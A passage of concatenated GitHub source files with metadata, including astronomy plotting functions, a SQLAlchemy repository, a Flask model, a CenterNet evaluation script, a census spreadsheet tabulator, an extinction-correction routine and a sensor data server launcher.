return fig\n\ndef display_polar_histogram(galcen_data, outpath, n_bins=100, norm_max = 1000, r_limits = (), title = \"Polar Plot\", is_save=True):\n \"\"\"A plot which displays a polar histogram of the stars in a galactocentric frame of reference.\n\n Args:\n galcen_data (Pandas DataFrame): The galactocentric data.\n n_bins (int, optional): Number of bins used in the plot. Defaults to 100.\n norm_max (int, optional): Colormap saturation limit for each bin. Defaults to 1000.\n r_limits (tuple, optional): Minimum and maximum edge of plotted area in r. If empty, it defaults to min, max r in data. Defaults to ().\n title (str, optional): The title string. Defaults to \"Polar Plot\".\n\n Returns:\n fig: The returned figure.\n \"\"\"\n from astropy.visualization.mpl_normalize import ImageNormalize\n from astropy.visualization import LogStretch\n\n fig= plt.figure(figsize=(10, 10), facecolor='white')\n\n # Init Data\n phi = galcen_data.phi\n r = galcen_data.r\n\n if not r_limits:\n min_r = np.min(galcen_data.r)\n max_r = np.max(galcen_data.r)\n else:\n min_r = r_limits[0]\n max_r = r_limits[1]\n\n plt.ylim(min_r, max_r)\n\n # Init Bins\n rbins = np.linspace(0, max_r, n_bins)\n abins = np.linspace(-np.pi,np.pi, n_bins)\n\n norm_hist2d = ImageNormalize(vmin=0., vmax=norm_max, stretch=LogStretch())\n\n ax = fig.add_subplot(111, projection='polar')\n plt.hist2d(phi, r, bins=(abins, rbins), norm = norm_hist2d)\n\n plt.title(title, pad=20, fontdict={'fontsize': 20})\n\n # Set r label background color to black\n plt.setp(ax.get_yticklabels(), backgroundcolor=\"black\")\n\n # Set r label font color to white\n ax.tick_params(axis=\"y\", colors=\"white\")\n\n # Configure angle labels\n ax.set_thetamin(360)\n ax.set_thetamax(0)\n\n cbar = plt.colorbar()\n cbar.ax.set_ylabel('Number of stars in bin')\n\n plt.grid()\n #plt.show()\n\n fig_name = '/sample_distribution_polar_coords'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef sample_distribution_galactic_coords(icrs_data, outpath, is_save = True):\n\n from astropy import units as u\n from astropy.coordinates import SkyCoord\n from matplotlib import colors\n\n c = SkyCoord(ra=list(icrs_data.ra)*u.degree, dec=list(icrs_data.dec)*u.degree, frame='icrs')\n\n fig = plt.figure(figsize=(16, 8))\n\n x = c.galactic.l.wrap_at(180*u.deg).to_value()\n y = c.galactic.b.wrap_at(180*u.deg).to_value()\n\n h = plt.hist2d(x, y, bins=250, cmin=50, norm=colors.PowerNorm(0.5), zorder=0.5)\n plt.scatter(x, y, alpha=0.05, s=1, color='k', zorder=0)\n\n fmt = mpl.ticker.ScalarFormatter(useMathText=True)\n fmt.set_powerlimits((0, 0))\n plt.colorbar(h[3], pad=0.02, format=fmt, orientation='vertical', label = 'Star density')\n\n plt.xlabel(r'$l$ [deg]', fontdict={'fontsize' : 16})\n plt.ylabel(r'$b$ [deg]', fontdict={'fontsize' : 16})\n\n plt.title(\"Sample Distribution in Galactic Coordinates\\n nstars = {}\".format(icrs_data.shape[0]), fontsize=18, pad=15)\n \n fig_name = '/sample_distribution_galactic_coords'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef plot_radial_distribution(sample, outpath, is_save=True):\n\n fig = plt.figure(figsize=(10, 10))\n\n fig.patch.set_facecolor('white')\n\n n_bins = 150\n r_min = 0\n r_max = np.max(sample.r_est)\n\n plt.hist(sample.r_est, bins=np.linspace(r_min, r_max, n_bins))\n\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n txt=\"{0} bins defined in the range [{1} - {2}] kpc\".format(n_bins, r_min, np.round(r_max))\n plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=12)\n\n plt.xlabel(r'$r$ (Heliocentric) [pc]', fontdict={'fontsize': 18}, labelpad = 20);\n plt.ylabel('Star count', fontdict={'fontsize': 18}, labelpad = 20);\n plt.xticks(fontsize=16)\n plt.yticks(fontsize=16)\n plt.grid()\n\n plt.rcParams[\"patch.force_edgecolor\"] = True\n plt.rc('font', **{'size':'16'})\n plt.title(\"Heliocentric Stellar Distances\\n nstars = {}\".format(sample.shape[0]), pad=20, fontdict={'fontsize': 20})\n\n fig_name = '/star_density_heliocentric_distribution'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef plot_distribution(sample, outpath, parameter, param_min, param_max, cutlines=None, is_save=True):\n \n fig, ax = plt.subplots(figsize=(10, 10))\n fig.patch.set_facecolor('white')\n\n n_bins = 150\n # param_min = -2000\n # param_max= 2000\n\n h = plt.hist(sample[parameter], bins=np.linspace(param_min, param_max, n_bins), alpha=1)\n\n #plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n txt=\"{0} bins defined in the range [{1} - {2}] pc\".format(n_bins, param_min, param_max)\n plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=12)\n\n plt.xlabel(r'${}$ [pc]'.format(parameter), fontdict={'fontsize': 18}, labelpad = 20);\n plt.ylabel('Star count', fontdict={'fontsize': 18}, labelpad = 20);\n plt.xticks(fontsize=16)\n plt.yticks(fontsize=16)\n plt.grid()\n\n plt.rcParams[\"patch.force_edgecolor\"] = True\n plt.rc('font', **{'size':'16'})\n\n plt.title(\"Star Density Histogram ({})\\n nstars = {}\".format(parameter, sample.shape[0]), pad=20, fontdict={'fontsize': 20})\n\n if(cutlines is not None):\n ax.vlines([cutlines[0], cutlines[1]], 0, np.max(h[0]), colors='yellow', linestyles='--')\n\n fig_name = '/star_density_{}_distribution'.format(parameter)\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef plot_velocity_distribution(bins, outpath, is_range=False, plot_MU=False, is_save = True):\n\n if(len(bins) % np.sqrt(len(bins)) == 0):\n figs_x = round(np.sqrt(len(bins)))\n figs_y = figs_x\n else:\n figs_x = round(np.sqrt(len(bins)))\n figs_y = figs_x+1\n\n if(len(bins) > 5):\n figsize = 15\n else:\n figsize = 10\n\n fig, axs = plt.subplots(figs_y, figs_x, figsize = (figsize,figsize))\n\n for i, ax in enumerate(axs.flat):\n if(i < len(bins)):\n\n if(np.abs(np.min(bins[i].data.v_phi) - np.max(bins[i].data.v_phi)) > 500):\n n_bins = 80\n else:\n n_bins = 40\n\n z_range = bins[i].z_boundaries\n r_range = bins[i].r_boundaries\n\n text_string = \"$z \\in [{:.1f}, {:.1f}]$\\n$r \\in [{:.1f}, {:.1f}]$\".format(z_range[0], z_range[1], \n r_range[0], r_range[1])\n ax.text(0.75, 0.8,text_string, horizontalalignment='center',\n verticalalignment='center',\n transform = ax.transAxes, fontdict={'fontsize': 12})\n\n if(is_range):\n mean = np.mean(bins[i].data.v_phi)\n median = np.median(bins[i].data.v_phi)\n if plot_MU: MLE_MU = bins[i].MLE_mu\n\n ax.hist(bins[i].data.v_phi, \n bins=n_bins, \n range = (mean-150, mean+150), \n edgecolor='black',\n density = True)\n\n ax.axvline(x=mean, ls=\"--\", label=\"Mean\", color='r')\n ax.axvline(x=median, ls=\"--\", label=\"Median\", color='orange')\n if plot_MU: ax.axvline(x=bins[i].MLE_mu, ls=\"--\", label=\"MLE\", color='white')\n ax.legend(loc=\"lower left\")\n\n ax.set_title(\"Bin No. {}\".format(i))\n\n else: \n ax.hist(bins[i].data.v_phi, \n bins=n_bins, \n edgecolor='black')\n \n ax.set_xlabel(\"$v_\\phi$ [km/s]\", fontdict={'fontsize': 15}, labelpad = 5) \n ax.set_ylabel(\"N\", fontdict={'fontsize': 15}, labelpad = 10, rotation=0)\n ax.yaxis.set_label_coords(-0.1, 1.0)\n\n \n else:\n fig.delaxes(ax)\n\n plt.tight_layout()\n\n fig_name = '/sample_velocity_distribution'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef plot_variance_distribution(bins, parameter, outpath, is_save=True):\n\n if(len(bins) % np.sqrt(len(bins)) == 0):\n figs_x = round(np.sqrt(len(bins)))\n figs_y = figs_x\n else:\n figs_x = round(np.sqrt(len(bins)))\n figs_y = figs_x+1\n\n if(len(bins) > 5):\n figsize = 15\n else:\n figsize = 10\n\n fig, axs = plt.subplots(figs_y, figs_x, figsize = (figsize,figsize))\n\n for i, ax in enumerate(axs.flat):\n\n if(i < len(bins)):\n\n n_bins = 160\n\n z_range = bins[i].z_boundaries\n r_range = bins[i].r_boundaries\n\n text_string = \"$z \\in [{:.1f}, {:.1f}]$\\n$r \\in [{:.1f}, {:.1f}]$\".format(z_range[0], z_range[1], \n r_range[0], r_range[1])\n ax.text(0.75, 0.8,text_string, horizontalalignment='center',\n verticalalignment='center',\n transform = ax.transAxes, fontdict={'fontsize': 12})\n\n\n var_array = bins[i].data.sig_vphi\n \n mean = np.mean(var_array)\n median = np.median(var_array)\n\n ax.hist(var_array, \n bins=n_bins,\n edgecolor='black',\n density = True)\n\n ax.axvline(x=mean, ls=\"--\", label=\"Mean\", color='r')\n ax.axvline(x=median, ls=\"--\", label=\"Median\", color='orange')\n ax.legend(loc=\"lower right\")\n ax.set_xlim(0, 0.5*np.max(var_array))\n ax.set_yscale('log')\n ax.set_title(\"Bin No. {}\".format(i))\n\n sub_index = \"{\" + \"v_\\{}\".format(parameter[parameter.find('_')+1:]) + \"}\"\n if(parameter == 'v_r'):\n sub_index = \"{\" + \"v_r\" + \"}\"\n \n ax.set_xlabel('$\\sigma^2_{}$ [km/s]'.format(sub_index), fontdict={'fontsize': 15}, labelpad = 5)\n ax.set_ylabel(\"N\", fontdict={'fontsize': 15}, labelpad = 10, rotation=0)\n ax.yaxis.set_label_coords(-0.1, 1.0)\n \n else:\n fig.delaxes(ax)\n\n plt.tight_layout()\n\n\n fig_name = '/sample_velocity_variance_distribution'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\n","repo_name":"HEP-KBFI/gaia-tools","sub_path":"gaia_tools/data_plot.py","file_name":"data_plot.py","file_ext":"py","file_size_in_byte":26342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"11652574925","text":"from typing import List, Optional\n\nfrom sqlalchemy.orm import Session\nfrom injector import inject\n\nfrom domain.repository import IOrderItemRepository\nfrom domain.model import OrderItemDOM\nfrom infra.schema import PatchedOrderItem as OrderItem\nfrom .util import orm_to_dom, orm_list_to_dom_list\n\n\nclass OrderItemRepository(IOrderItemRepository):\n @inject\n def __init__(self, db: Session) -> None:\n self.db = db\n\n def find(self, order_item_id: str) -> Optional[OrderItemDOM]:\n orm_order_item = self.db.query(OrderItem).get(order_item_id)\n return orm_to_dom(OrderItemDOM, orm_order_item) if orm_order_item else None\n\n def save(self, order_item: OrderItemDOM) -> str:\n orm_order_item = OrderItem(**order_item.to_rdb_dict())\n try:\n self.db.add(orm_order_item)\n self.db.flush()\n except Exception as e:\n self.db.rollback()\n raise e\n\n self.db.commit()\n return orm_order_item.id\n\n def update(self, order_item: OrderItemDOM) -> None:\n try:\n orm_order_item = self.db.query(OrderItem).get(order_item.id)\n for k, v in order_item.dict().items():\n setattr(orm_order_item, k, v)\n self.db.flush()\n except Exception as e:\n self.db.rollback()\n raise e\n\n self.db.commit()\n\n def delete(self, order_item: OrderItemDOM) -> None:\n try:\n orm_order_item = self.db.query(OrderItem).get(order_item.id)\n self.db.delete(orm_order_item)\n self.db.flush()\n except Exception as e:\n self.db.rollback()\n raise e\n\n self.db.commit()\n\n def list(self) -> List[OrderItemDOM]:\n orm_order_items = self.db.query(OrderItem).all()\n return orm_list_to_dom_list(OrderItemDOM, orm_order_items)\n","repo_name":"sin392/sw-order","sub_path":"app/infra/repository/order_item.py","file_name":"order_item.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72610765520","text":"from flask_app import app\nfrom flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import render_template,request,redirect,session,flash, get_flashed_messages\nfrom flask import flash\nfrom flask_bcrypt import Bcrypt\nimport re\nfrom flask_app.models import director\n\n\nclass Movie:\n\n db = \"movies_db\"\n def __init__(self,data):\n self.id = data['id']\n self.title = data['title']\n self.release_date = data['release_date']\n self.director_id = data['director_id']\n self.director = None\n \n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM movies JOIN directors ON directors.id = movies.director_id;\"\n result = connectToMySQL(cls.db).query_db(query)\n movies_list =[]\n for row in result:\n #create the movie object\n movie_ob = cls(row)\n #create the director object\n director_data ={\n 'id':row['directors.id'],\n 'first_name': row['first_name'],\n 'last_name': row['last_name']\n }\n director_ob = director.Director(director_data)\n #associate the two objects together\n movie_ob.director = director_ob\n movies_list.append(movie_ob)\n return movies_list\n\n @classmethod\n def create(cls,data):\n query = \"INSERT INTO movies (title, release_date,director_id ) VALUES (%(title)s, %(release_date)s, %(director_id)s);\"\n result = connectToMySQL(cls.db).query_db(query,data)\n return result","repo_name":"ChewChuenChan/deploy_movies_proj","sub_path":"flask_app/models/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71810603921","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\n\nimport torch\nimport torch.utils.data\nfrom opts import opts\nfrom model.model import create_model, load_model, save_model\nfrom model.data_parallel import DataParallel\nfrom logger import Logger\nfrom dataset.dataset_factory import get_dataset\nfrom trainer import Trainer\n\ndef get_optimizer(opt, model):\n optimizer = torch.optim.Adam(model.parameters(), opt.lr, weight_decay=opt.weight_decay)\n return optimizer\n\ndef main(opt):\n torch.manual_seed(opt.seed)\n torch.backends.cudnn.benchmark = not opt.not_cuda_benchmark and not opt.test\n Dataset = get_dataset(opt.dataset)\n opt = opts().update_dataset_info_and_set_heads(opt, Dataset)\n opt.eval_depth = True\n print(opt)\n if not opt.not_set_cuda_env:\n os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str\n opt.device = torch.device('cuda' if opt.gpus[0] >= 0 else 'cpu')\n logger = Logger(opt)\n\n print('Creating model...')\n model = create_model(opt.arch, opt.heads, opt.head_conv, opt=opt)\n optimizer = get_optimizer(opt, model)\n start_epoch = 0\n if opt.load_model != '':\n model, optimizer, start_epoch = load_model(\n model, opt.load_model, opt, optimizer)\n\n trainer = Trainer(opt, model, optimizer)\n trainer.set_device(opt.gpus, opt.chunk_sizes, opt.device)\n\n print('Setting up validation data...')\n val_loader = torch.utils.data.DataLoader(\n Dataset(opt, 'val'), batch_size=1, shuffle=False, num_workers=1,\n pin_memory=True)\n\n if opt.test:\n _, preds = trainer.val(0, val_loader)\n val_loader.dataset.run_eval(preds, opt.save_dir)\n return\n\n print('Starting eval...')\n with torch.no_grad():\n log_dict_val, preds = trainer.val(1, val_loader)\n if opt.eval_val:\n val_loader.dataset.run_eval(preds, opt.save_dir)\n\n\nif __name__ == '__main__':\n opt = opts().parse()\n main(opt)\n","repo_name":"YoungSkKim/CenterNet-Boost","sub_path":"src/eval_depth.py","file_name":"eval_depth.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"33524055794","text":"# readCensusExcel.py - Tabulates population and number of census tracts\n# for each county.\n\nimport openpyxl\nimport docx\n\n# Read the spreadsheet data\nprint('Opening workbook...')\nwb = openpyxl.load_workbook('censuspopdata.xlsx')\nsheet = wb.get_sheet_by_name('Population by Census Tract')\n\ncountryData = {}\nstateData = {}\n\n# Fill in countyData with each county's population and tracts.\nprint('Reading rows...')\nfor row in range(2, sheet.max_row + 1):\n # Each row in the spreadsheet has data for one census tract.\n state = sheet['B' + str(row)].value\n county = sheet['C' + str(row)].value\n pop = sheet['D' + str(row)].value\n\n # Make sure the key for this state exists.\n countryData.setdefault(state, {})\n # Make sure the key for this county in this state exists.\n countryData[state].setdefault(county, {'tracts': 0, 'pop': 0})\n\n # Each row represents one census tract, so increment by one.\n countryData[state][county]['tracts'] += 1\n # Increase the county pop by the pop in this census tract.\n countryData[state][county]['pop'] += int(pop)\n\n\n stateData.setdefault(state, 0)\n stateData[state] += int(pop)\n\n\n# Open a new text file and write the contents of countyData to it.\nprint('Writing results...')\ndoc = docx.Document()\n\ntable = doc.add_table(rows=1, cols=2)\ntable.style = 'Light Grid Accent 1'\n\n# Table head\nhdr_cells = table.rows[0].cells\nhdr_cells[0].text = 'State'\nhdr_cells[1].text = 'Population'\n\nfor stateName, statistic in stateData.items():\n row_cells = table.add_row().cells\n row_cells[0].text = stateName\n row_cells[1].text = str(statistic)\n\ndoc.save('PopulationStatistic.docx')\nprint('Done.')\n\n","repo_name":"Chandler-Song/Python_Awesome","sub_path":"Python_ABC/2-12excel/6excelWord.py","file_name":"6excelWord.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23299812331","text":"import sys\nimport numpy as np\nimport scipy.interpolate as inter\nimport matplotlib.pyplot as plt\n\n\ndef curve(x):\n \"\"\"\n Cardelli 1989\n \"\"\"\n x = 10000./x\n y = x - 1.82\n \n a=np.polyval([0.32999, -0.77530, 0.01979, 0.72085, -0.02427, -0.50447, 0.17699, 1.], y)\n b=np.polyval([-2.09002, 5.30260, -0.62251, -5.38434, 1.07233, 2.28305, 1.41338, 0.], y)\n \n R=3.1\n return a+b/R\n\ndef extinction(field, input, output):\n\n# original sensitivity function\n wave0 = np.genfromtxt(input, comments='#')[:,0]\n factor0 = np.genfromtxt(input, comments='#')[:,1]\n factor0_err = np.genfromtxt(input, comments='#')[:, 2]\n\n if(field=='GOODSS'):\n Av=0.019\n if(field=='UDS'):\n Av=0.061\n if(field=='COSMOS'):\n Av=0.051\n\n# A_lambda\n A_lambda = curve(wave0)*Av\n\n# corrected sensitivity function\n factor=factor0*10**(0.4*A_lambda)\n factor_err = factor0_err*10**(0.4*A_lambda)\n\n# f=plt.figure()\n# plt.plot(wave0, factor0, label='Original curve')\n# plt.plot(wave0, factor, label='Extinction corrected curve')\n# plt.plot(wave0, factor/factor0)\n# plt.xlabel('Wavelength [Angstroms]')\n# plt.ylabel('(ergs/s/cm2/A)/(e/s/pix)')\n# plt.legend()\n# plt.show()\n\n lun = open(output, 'w')\n lun.write('# Flux calibration Curve'+'\\n')\n lun.write('# Angstroms (erg/s/cm2/A)/(e/s/pix)'+'\\n')\n output_data = np.vstack((wave0, factor, factor_err)).T\n np.savetxt(lun, output_data)\n lun.close()","repo_name":"aguilerav/m2fs_reduction","sub_path":"m2fs_pipeline/extinction.py","file_name":"extinction.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24504633652","text":"from serial.tools.list_ports import comports\nimport argparse\nfrom datetime import datetime\n\nfrom multiprocessing import Process # 进程\nfrom multiprocessing import Array # 共享内存\nfrom multiprocessing import Value # 共享内存\nfrom multiprocessing import Pipe # 进程间通信管道\n\nimport traceback\n\nfrom matsense.serverkit import Proc, Userver, FLAG\nfrom matsense.datasetter import (\n\tDataSetterSerial, DataSetterDebug, DataSetterFile\n)\nfrom matsense.exception import CustomException\nfrom matsense.tools import (\n\tload_config, blank_config, check_config, print_sensor, \n make_action, DEST_SUFFIX\n)\nfrom matsense.filemanager import clear_file\n\n\nN = 16 # sensor side length\nBAUDRATE = 500000\nTIMEOUT = 1 # in seconds\ndevices_found = comports()\nPORT = None\ntry:\n\t## default use the last port on the list\n\tPORT = devices_found[-1].device\nexcept:\n\tpass\n\nUDP = False\nNO_CONVERT = False\n\nZLIM = 3\nFPS = 100\n\nDEBUG = False\nOUTPUT_FILENAME_TEMPLATE = \"processed_%Y%m%d%H%M%S.csv\"\nOUTPUT_FILENAME = datetime.now().strftime(OUTPUT_FILENAME_TEMPLATE)\n\nINTERMEDIATE = 0\n\n\ndef enumerate_ports():\n\t# 查看可用端口\n\tprint(\"All serial ports:\")\n\tfor item in devices_found:\n\t\tprint(item)\n\ndef task_serial(paras):\n\tret = None\n\ttry:\n\t\tif paras['config']['server_mode']['debug']:\n\t\t\tmy_setter = DataSetterDebug()\n\t\telse:\n\t\t\tmy_setter = DataSetterSerial(\n\t\t\t\tparas['config']['sensor']['total'], \n\t\t\t\tparas['config']['serial']['baudrate'], \n\t\t\t\tparas['config']['serial']['port'], \n\t\t\t\tparas['config']['serial']['timeout'],\n\t\t\t\timu=paras['config']['serial']['imu'],\n\t\t\t\tprotocol=paras['config']['serial']['protocol'],\n\t\t\t)\n\t\tmy_proc = Proc(\n\t\t\tparas['config']['sensor']['shape'], \n\t\t\tmy_setter, \n\t\t\tparas['data_out'], \n\t\t\tparas['data_raw'], \n\t\t\tparas['data_imu'], \n\t\t\tparas['idx_out'],\n\t\t\traw=paras['config']['process']['raw'],\n\t\t\twarm_up=paras['config']['process']['warm_up'],\n\t\t\tV0=paras['config']['process']['V0'],\n\t\t\tR0_RECI=paras['config']['process']['R0_RECI'],\n\t\t\tconvert=paras['config']['process']['convert'],\n\t\t\tmask=paras['config']['sensor']['mask'],\n\t\t\tfilter_spatial=paras['config']['process']['filter_spatial'],\n\t\t\tfilter_spatial_cutoff=paras['config']['process']['filter_spatial_cutoff'],\n\t\t\tbutterworth_order=paras['config']['process']['butterworth_order'],\n\t\t\tfilter_temporal=paras['config']['process']['filter_temporal'],\n\t\t\tfilter_temporal_size=paras['config']['process']['filter_temporal_size'],\n\t\t\trw_cutoff=paras['config']['process']['rw_cutoff'],\n\t\t\tcali_frames=paras['config']['process']['cali_frames'],\n\t\t\tcali_win_size=paras['config']['process']['cali_win_size'],\n\t\t\tpipe_conn=paras['pipe_proc'],\n\t\t\tcopy_tags=False,\n\t\t\timu=paras['config']['serial']['imu'],\n\t\t\tintermediate=paras['config']['process']['intermediate']\n\t\t)\n\t\tret = my_proc.run()\n\texcept KeyboardInterrupt:\n\t\tpass\n\texcept CustomException as e:\n\t\tprint(e)\n\texcept BaseException as e:\n\t\ttraceback.print_exc()\n\t\t# print(e)\n\tfinally:\n\t\t## close the other process\n\t\tparas['pipe_proc'].send((FLAG.FLAG_STOP,))\n\tprint(\"Processing stopped.\")\n\treturn ret\n\ndef task_server(paras):\n\ttry:\n\t\twith Userver(\n\t\t\tparas['data_out'], \n\t\t\tparas['data_raw'], \n\t\t\tparas['data_imu'], \n\t\t\tparas['idx_out'], \n\t\t\tparas['config']['connection']['server_address'], \n\t\t\ttotal=paras['config']['sensor']['total'],\n\t\t\tudp=paras['config']['connection']['udp'],\n\t\t\tpipe_conn=paras['pipe_server'],\n\t\t\tconfig_copy=paras['config'],\n\t\t) as my_server:\n\t\t\tmy_server.run_service()\n\texcept KeyboardInterrupt:\n\t\tpass\n\texcept CustomException as e:\n\t\tprint(e)\n\texcept BaseException as e:\n\t\ttraceback.print_exc()\n\t\t# print(e)\n\tfinally:\n\t\t## close the other process\n\t\tparas['pipe_server'].send((FLAG.FLAG_STOP,))\n\ndef task_file(paras):\n\tprint(f\"Processed data saved to: {paras['config']['data']['out_filename']}\")\n\tmy_setter = DataSetterFile(\n\t\tparas['config']['sensor']['total'], \n\t\tparas['config']['data']['in_filenames'], \n\t)\n\tmy_proc = Proc(\n\t\tparas['config']['sensor']['shape'], \n\t\tmy_setter, \n\t\tparas['data_out'], \n\t\tparas['data_raw'], \n\t\tparas['idx_out'],\n\t\traw=False,\n\t\twarm_up=0,\n\t\tV0=paras['config']['process']['V0'],\n\t\tR0_RECI=paras['config']['process']['R0_RECI'],\n\t\tconvert=paras['config']['process']['convert'],\n\t\tmask=paras['config']['sensor']['mask'],\n\t\tfilter_spatial=paras['config']['process']['filter_spatial'],\n\t\tfilter_spatial_cutoff=paras['config']['process']['filter_spatial_cutoff'],\n\t\tbutterworth_order=paras['config']['process']['butterworth_order'],\n\t\tfilter_temporal=paras['config']['process']['filter_temporal'],\n\t\tfilter_temporal_size=paras['config']['process']['filter_temporal_size'],\n\t\trw_cutoff=paras['config']['process']['rw_cutoff'],\n\t\tcali_frames=paras['config']['process']['cali_frames'],\n\t\tcali_win_size=paras['config']['process']['cali_win_size'],\n\t\tpipe_conn=None,\n\t\toutput_filename=paras['config']['data']['out_filename'],\n\t\tcopy_tags=True,\n\t)\n\t## clear file content\n\tclear_file(paras['config']['data']['out_filename'])\n\tmy_proc.run()\n\ndef prepare_config(args):\n\t## load config and combine commandline arguments\n\tif args.config:\n\t\tconfig = load_config(args.config)\n\telse:\n\t\tconfig = blank_config()\n\t## priority: commandline arguments > config file > program defaults\n\tif config['sensor']['shape'] is None or hasattr(args, 'n'+DEST_SUFFIX):\n\t\tconfig['sensor']['shape'] = args.n\n\tif config['serial']['baudrate'] is None or hasattr(args, 'baudrate'+DEST_SUFFIX):\n\t\tconfig['serial']['baudrate'] = args.baudrate\n\tif config['serial']['timeout'] is None or hasattr(args, 'timeout'+DEST_SUFFIX):\n\t\tconfig['serial']['timeout'] = args.timeout\n\tif config['serial']['port'] is None or hasattr(args, 'port'+DEST_SUFFIX):\n\t\tconfig['serial']['port'] = args.port\n\tif config['connection']['udp'] is None or hasattr(args, 'udp'+DEST_SUFFIX):\n\t\tconfig['connection']['udp'] = args.udp\n\tif config['connection']['server_address'] is None or hasattr(args, 'address'+DEST_SUFFIX):\n\t\tconfig['connection']['server_address'] = args.address\n\tif config['process']['convert'] is None or hasattr(args, 'no_convert'+DEST_SUFFIX):\n\t\tconfig['process']['convert'] = not args.no_convert\n\tif config['visual']['zlim'] is None or hasattr(args, 'zlim'+DEST_SUFFIX):\n\t\tconfig['visual']['zlim'] = args.zlim\n\tif config['visual']['fps'] is None or hasattr(args, 'fps'+DEST_SUFFIX):\n\t\tconfig['visual']['fps'] = args.fps\n\tif config['visual']['pyqtgraph'] is None or hasattr(args, 'pyqtgraph'+DEST_SUFFIX):\n\t\tconfig['visual']['pyqtgraph'] = args.pyqtgraph\n\tif config['visual']['scatter'] is None or hasattr(args, 'scatter'+DEST_SUFFIX):\n\t\tconfig['visual']['scatter'] = args.scatter\n\tif config['server_mode']['service'] is None or hasattr(args, 'noservice'+DEST_SUFFIX):\n\t\tconfig['server_mode']['service'] = not args.noservice\n\tif config['process']['raw'] is None or hasattr(args, 'raw'+DEST_SUFFIX):\n\t\tconfig['process']['raw'] = args.raw\n\tif config['server_mode']['visualize'] is None or hasattr(args, 'visualize'+DEST_SUFFIX):\n\t\tconfig['server_mode']['visualize'] = args.visualize\n\tif config['server_mode']['enumerate'] is None or hasattr(args, 'enumerate'+DEST_SUFFIX):\n\t\tconfig['server_mode']['enumerate'] = args.enumerate\n\tif config['server_mode']['debug'] is None or hasattr(args, 'debug'+DEST_SUFFIX):\n\t\tconfig['server_mode']['debug'] = args.debug\n\tif config['data']['out_filename'] is None or hasattr(args, 'output'+DEST_SUFFIX):\n\t\tconfig['data']['out_filename'] = args.output\n\tif config['server_mode']['use_file'] is None:\n\t\tconfig['server_mode']['use_file'] = False\n\tif config['serial']['imu'] is None or hasattr(args, 'imu'+DEST_SUFFIX):\n\t\tconfig['serial']['imu'] = args.imu\n\tif config['process']['intermediate'] is None or hasattr(args, 'intermediate'+DEST_SUFFIX):\n\t\tconfig['process']['intermediate'] = args.intermediate\n\n\t## some modifications\n\tif args.filenames:\n\t\tconfig['server_mode']['use_file'] = True\n\t\tconfig['data']['in_filenames'] = args.filenames\n\n\tcheck_config(config)\n\treturn config\n\ndef run(config):\n\tret = None\n\n\t## enumerate serial ports\n\tif config['server_mode']['enumerate']:\n\t\tenumerate_ports()\n\t\treturn\n\n\tprint_sensor(config)\n\n\t## shared variables\n\t## output data array\n\tdata_out = Array('d', config['sensor']['total']) # d for double\n\t## raw data array\n\tdata_raw = Array('d', config['sensor']['total']) # d for double\n\t## imu data array\n\tdata_imu = Array('d', 6) # d for double\n\t## frame index\n\tidx_out = Value('i') # i for signed int\n\t## Proc-Userver communication pipe\n\tpipe_proc, pipe_server = Pipe(duplex=True)\n\n\t## function parameters\n\tparas = {\n\t\t\"config\": config,\n\t\t\"data_out\": data_out,\n\t\t\"data_raw\": data_raw,\n\t\t\"data_imu\": data_imu,\n\t\t\"idx_out\": idx_out,\n\t\t\"pipe_proc\": pipe_proc,\n\t\t\"pipe_server\": pipe_server,\n\t}\n\n\tif config['server_mode']['use_file']:\n\t\ttask_file(paras)\n\t\treturn\n\n\tif config['server_mode']['visualize']:\n\t\tp = Process(target=task_serial, args=(paras,))\n\t\tp.start()\n\n\t\tif not config['visual']['pyqtgraph']:\n\t\t\tfrom matsense.visual.player_matplot import Player3DMatplot as Player\n\t\t\tprint(\"Activate visualization using matplotlib\")\n\t\telse:\n\t\t\tfrom matsense.visual.player_pyqtgraph import Player3DPyqtgraph as Player\n\t\t\tprint(\"Activate visualization using pyqtgraph\")\n\t\t## visualization must be in main process\n\t\tfrom matsense.visual import gen_reshape\n\t\tmy_player = Player(\n\t\t\tzlim=config['visual']['zlim'], \n\t\t\tN=config['sensor']['shape'],\n\t\t\tscatter=config['visual']['scatter']\n\t\t)\n\t\tmy_player.run_stream(\n\t\t\tgenerator=gen_reshape(data_out, config['sensor']['shape']), \n\t\t\tfps=config['visual']['fps']\n\t\t)\n\n\t\tp.join()\n\telse:\n\t\tif config['server_mode']['service']:\n\t\t\tp_server = Process(target=task_server, 